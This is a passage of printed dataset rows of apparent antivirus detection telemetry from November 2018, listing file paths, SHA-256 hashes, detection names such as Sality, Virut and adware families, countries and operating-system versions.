  Row(detection=Row(filename='yahoo! powered maret', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered maret', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='d10b64f3d6d9307bbc0c72f71da97d688d13752bb597a30c0fff8fd1a3dfd5cd', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T14:38:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='privacy', filepath='/Volumes/Seagate Expansion Drive/Backups.backupdb/iMac/2018-10-27-014531/Macintosh HD/Applications/Mac Auto Fixer.app/Contents/PlugIns/Privacy.plugin/Contents/MacOS/Privacy', filesize=748000, name='OSX/GT32SupportGeeks.guhch.#M0.#R0'), hash='e22ee5368f3d08e28aae4acd1dd0994f2ed34fdd0ab162ba8d6e175daf0d26b0', metadata=Row(cmdline=None, country='CH', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T10:03:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='back graund.exe', filepath='H:\\\xa0\\Back graund\\Back graund.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:49:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='\xa0.exe', filepath='H:\\\xa0\\\xa0.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:40:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='menudetour_es.html', filepath='\\\\?\\F:\\Drive\\sanosy\\الألعاب\\mohamed\\Games\\games\\FIFA 07\\data\\EASO\\commonHtml\\menuDetour_es.html', filesize=492000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='ffecfae99fe322b81d1b207dfdf0792daa69bf7e31a1960fee8fcc0ef8e932a5', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:03:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='fa97aba00f1b5fe70ec5c62dc1c08d559e20d0b64045f375fda312e85c4491d5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T05:01:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='concept note v300518.exe', filepath='f:\\\xa0\\philipin\\Concept Note v300518.exe', filesize=1920000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='f47bf29effd2941b7d51f4a41c72795a1a508cbd1622e02ed72308f22944bf8f', metadata=Row(cmdline=None, country='LA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:14:38Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:28:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ehshell.exe', filepath='C:\\Windows\\ehome\\ehshell.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='45be007a8ae20a92b3dd34e6c9760c9a9fdb69663daaf7b6d5c320636714601b', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2640384, timestamp='2018-11-02T04:17:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T02:45:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered farol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered farol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='06abc6933c1953a197eaab4f6116ef8aab1209dfc72aa10a38bddb5f0798546c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:31:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:49:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate (4).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (4).exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T01:02:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-084111-f2db9655', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-084111-F2DB9655', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='3f81ed12cf783663ace3f754bb552275736986b0a32bad2f9b6b660428c149a7', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:43:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-102101-a76b7366', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2d3db38b\\AVSCAN-20181102-101826-91C75354\\AVSCAN-20181102-102101-A76B7366', filesize=64000, name='TR/Siggen.64000.2.#M1.#R1'), hash='33e25a0a50e61900ef969fe4a406e8d89dec25d5081b0403b61e97927c18403d', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T03:20:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-14-12-07.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-27T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T22:42:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2009.pif', filepath='D:\\DOKUMENKU\\KOMPOSISI DANA\\2009\\2009.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe14_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe14 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T08:47:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-160013-eea325af', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-160013-EEA325AF', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:00:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-194104-fed2294b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6b332e29\\AVSCAN-20181102-192351-465271A7\\AVSCAN-20181102-194104-FED2294B', filesize=960000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='5a436798dbe7503e99e0db771b57e5f33da119ee6b3f5ebe8d3f37aa3c8e7ec5', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T18:41:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashUpdate.exe', filesize=1536000, name='TR/Dropper.Gen.#M300.#R3467'), hash='52f99fcbf44511b44e259588d108dd195cbdcc3e629cca0140a65a22aa14bd85', metadata=Row(cmdline=None, country='BA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T21:46:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flame painter.exe', filepath='D:\\#BIG电脑文件\\D\\BIG\\资料收集\\FLAME PAINTER.EXE', filesize=6144000, name='TR/Agent.6144000.#M1.#R1'), hash='242686846d03f68c5c791dad7a01cd02662dfc9a6418c978b6194ad6b812f847', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T02:51:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe2_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe2 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T17:48:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered docif', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered docif', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='5d3e1662e81cf3058a2979d5ca569df72fda4aa3b500d2b6d3f3aea6fda7f20a', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:09:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-02-07-05-09.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-22T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T19:15:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autorun (2).inf.exe', filepath='G:\\autorun (2).inf\\autorun (2).inf.exe', filesize=4096000, name='TR/Worm.Gen.#M300.#R7610'), hash='6d12e686f4ec82ec0a3334e50ff82aeee4f81ab3622fdf8a7bf5008455301f84', metadata=Row(cmdline='rtp', country='MZ', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1866864, timestamp='2018-11-02T08:20:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashbang.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\AMMO\\FLASHBANG\\FLASHBANG.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='2593ba0a28981e3448337a8e2379014eaefb919a6c4272bed565c82b425f30f9', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a25b0ff698ae1f170428b2d709e55e5e08cc1b8d', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\a25b0ff698ae1f170428b2d709e55e5e08cc1b8d', filesize=2112000, name='Adware/DealPly.193e42.#M1.#R1'), hash='193e42dc8533ae96534541d78d54719cf50e50d64ddf22c8588cf3519bae3d3b', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T20:40:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:42:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='paper_11.htm', filepath='C:\\Users\\X\\Dropbox (TANTO CITRA MANDIRI)\\TANTO CITRA MANDIRI Team Folder\\Campur2\\File Epson\\Manual\\SetupGuide\\UZ\\paper_11.htm', filesize=12000, name='W32/Chir.B.#M1.#R1'), hash='1c1b971371faee0937c17e1ce16c3f8a32a30f6996c4a17729c9ff9754893179', metadata=Row(cmdline='\\\\\\/systemstartup', country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Dropbox\\Client\\Dropbox.exe', parentsize=3784512, timestamp='2018-11-02T07:47:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='service_kms.exe', filepath='C:\\Program Files\\KMSpico\\Service_KMS.exe', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline='-u -p 1088 -s 720', country='EG', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\System32\\WerFault.exe', parentsize=385672, timestamp='2018-11-02T09:36:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:35:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='supra_fast_and_furious.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\New Folder (2)\\CARS\\supra_fast_and_furious\\supra_fast_and_furious.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='20d0a90862ee256acffbcae90ad1cfb3c3ad06aabb3a78023e07e3382293e692', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:26:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:28:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:28:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='afuwin.exe', filepath='E:\\Program Files\\ASUS\\AI Suite II\\ASUS Update\\Compal\\32\\afuwin.exe', filesize=336000, name='W32/Sality.AT.#M1.#R1'), hash='1b55afb78f6ef9b3a010aba4ffe52bb8ba2e4b4a198aa2537ddf40a47c4746d3', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:43:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-121748-6781bd5d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_07226c0d\\AVSCAN-20181102-121652-605C135C\\AVSCAN-20181102-121748-6781BD5D', filesize=768000, name='HEUR/APC.#M1.#R1'), hash='04239a5a53d71e87acf2a3ae5873657ccbbbd8fd6e6c39562ccaa8fe2859b7dd', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T11:17:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:06:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:19:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:51:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-130836-51b34cde', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b904e2c7\\AVSCAN-20181102-130339-1F8FC670\\AVSCAN-20181102-130836-51B34CDE', filesize=636000, name='TR/Agent.636000.#M1.#R1'), hash='3c0a61c70af2a473c51043a62290977956ae4af0048f3db2f2caf758f6ab9011', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:37:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa6168.39018\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa6168.39018\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T10:01:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:20:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-175838-2600f331', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23c10ab5\\AVSCAN-20181102-173208-165F3A81\\AVSCAN-20181102-175838-2600F331', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:58:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-003449-0a21f812', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0b12a170\\AVSCAN-20181103-003404-01CB9A8E\\AVSCAN-20181103-003449-0A21F812', filesize=448000, name='Adware/FileTour.wry.#M1.#R1'), hash='07f5273a5ad4248030d732407f1a18edbadb1a63d281200a63e09b75c30185eb', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:33:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:32:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='0d1593e54e93e09077e3ca8722f813d99da89241786fbc8a9bbce08446682b95', metadata=Row(cmdline=None, country='MK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:59:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='models.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\MODELS\\MODELS.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='2c518e8aa5bb143e1ddee53f8712262129b5a411942a728bd2a3f0babbdedbcf', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:26:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T06:08:53Z'), dt=datetime.date(2018, 11, 2)),
